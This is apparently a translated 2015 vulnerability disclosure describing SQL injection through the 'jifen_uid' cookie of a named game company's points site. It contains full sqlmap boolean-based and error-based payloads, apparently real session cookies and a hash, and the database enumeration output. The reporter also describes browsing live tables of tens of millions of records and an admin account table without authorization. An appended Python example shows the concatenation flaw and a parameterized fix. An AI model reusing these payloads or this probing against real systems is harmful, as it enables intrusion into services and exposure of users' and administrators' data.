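2015-06-02: Details reported to the vendor; awaiting vendor handling
2015-06-07: The vendor actively ignored the vulnerability; details disclosed to the public
[HD] In the name of the team, for the glory of the individual, building network security together
I originally wanted to test whether points could be redeemed without limit, but unexpectedly found an injection point instead.
The parameter jifen_uid is not filtered. I ran it through sqlmap.
There are 7 databases in total, but they involve a large amount of data and tables (I looked at two databases, one cd and one vip. The data in cd is as shown in the figure: two tables with more than 80 million records each... The vip database has more than two thousand tables, so I did not go on dumping it. I just looked at the data of one admin_user table, which contains 51 accounts.)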
Cookie parameter 'jifen_uid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 9312 HTTP(s) requests:
---
Place: Cookie
Parameter: jifen_uid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uniqid=1505291124359537771505; uniqid_a=1505291124359537771505; ref=0; date=2015-05-29+11:24:35; ref_date=2015-05-29+11:24:35; ref_ip=42.81.42.133; check_cookie_jsztgamecom=123; _jslog_logininfo_yzd=eyIzNTM4OTc0MzYiOlsiMzUzODk3NDM2IiwiMjAxNS0wNi0wMSAyMTo1NToyOCIsMiwiTlVMTCIsIk5VTEwiXX0=; jifen_uid=353897436 AND 5585=5585; jifen_account=wooyun124; jifen_hash=590b4a1b2b7ffe53156b76c819edc78f; jiathis_rdc={"http://jf.ztgame.com/share.php?uid=353897436%26url=http%3A%2F%2Fjf.ztgame.com":"0|1433167006973"}

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: uniqid=1505291124359537771505; uniqid_a=1505291124359537771505; ref=0; date=2015-05-29+11:24:35; ref_date=2015-05-29+11:24:35; ref_ip=42.81.42.133; check_cookie_jsztgamecom=123; _jslog_logininfo_yzd=eyIzNTM4OTc0MzYiOlsiMzUzODk3NDM2IiwiMjAxNS0wNi0wMSAyMTo1NToyOCIsMiwiTlVMTCIsIk5VTEwiXX0=; jifen_uid=353897436 AND (SELECT 7983 FROM(SELECT COUNT(*),CONCAT(0x7177636a71,(SELECT (CASE WHEN (7983=7983) THEN 1 ELSE 0 END)),0x7177777571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a); jifen_account=wooyun124; jifen_hash=590b4a1b2b7ffe53156b76c819edc78f; jiathis_rdc={"http://jf.ztgame.com/share.php?uid=353897436%26url=http%3A%2F%2Fjf.ztgame.com":"0|1433167006973"}
---
[22:47:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.25, PHP 5.4.4
back-end DBMS: MySQL 5.0
[22:47:55] [INFO] fetching database names
[22:47:55] [INFO] the SQL query used returns 7 entries
[22:47:55] [INFO] retrieved: information_schema
[22:47:55] [INFO] retrieved: cb
[22:47:55] [INFO] retrieved: logs
[22:47:55] [INFO] retrieved: mysql
[22:47:55] [INFO] retrieved: performance_schema
[22:47:55] [INFO] retrieved: test
[22:47:55] [INFO] retrieved: vip
available databases [7]:
[*] cb
[*] information_schema
[*] logs
[*] mysql
[*] performance_schema
[*] test
[*] vip
Is there a gift?
Severity: no impact (ignored by vendor)
Ignored at: 2015-06-07 09:20
Vulnerability Rank: 15 (WooYun rating)
None yet
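The fix for the unfiltered jifen_uid cookie reported above, as an added example that is not code from the report or from the vendor: the cookie value is concatenated into the query in one function and validated and bound as a parameter in the other. The table name, column names and in-memory SQLite database are assumptions standing in for the PHP/MySQL back end shown in the sqlmap output.

```python
import re
import sqlite3

# Cookie header shortened from the sqlmap output above (boolean-based payload).
INJECTED = "ref=0; jifen_uid=353897436 AND 5585=5585; jifen_account=wooyun124"
CLEAN = "ref=0; jifen_uid=353897436; jifen_account=wooyun124"
UID_RE = re.compile(r"[0-9]{1,18}")  # ASCII digits only, bounded length


def make_db():
    """Constructed stand-in: hypothetical table, SQLite in place of MySQL."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE jifen_user (uid INTEGER PRIMARY KEY, points INTEGER)")
    db.executemany("INSERT INTO jifen_user VALUES (?, ?)",
                   [(353897436, 120), (1001, 50)])
    return db


def cookie_value(header, name):
    """Return the raw value of one cookie from a Cookie header, or None."""
    for part in header.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep and key == name:
            return value
    return None


def points_vulnerable(db, header):
    """The flaw in the report: cookie text becomes part of the SQL statement."""
    uid = cookie_value(header, "jifen_uid")
    sql = "SELECT points FROM jifen_user WHERE uid = " + str(uid)
    return db.execute(sql).fetchall()


def points_hardened(db, header):
    """Reject anything that is not a plain integer, then bind it as a parameter."""
    uid = cookie_value(header, "jifen_uid")
    if uid is None or not UID_RE.fullmatch(uid):
        raise ValueError("jifen_uid is not a plain integer")
    sql = "SELECT points FROM jifen_user WHERE uid = ?"
    return db.execute(sql, (int(uid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected cookie:", points_vulnerable(db, INJECTED))
    print("hardened, clean cookie:", points_hardened(db, CLEAN))
    try:
        points_hardened(db, INJECTED)
    except ValueError as exc:
        print("hardened, injected cookie rejected:", exc)
```

The rejection in `points_hardened` is also a useful logging point: a jifen_uid cookie that is not purely numeric never occurs in normal traffic, so each rejection is worth an alert.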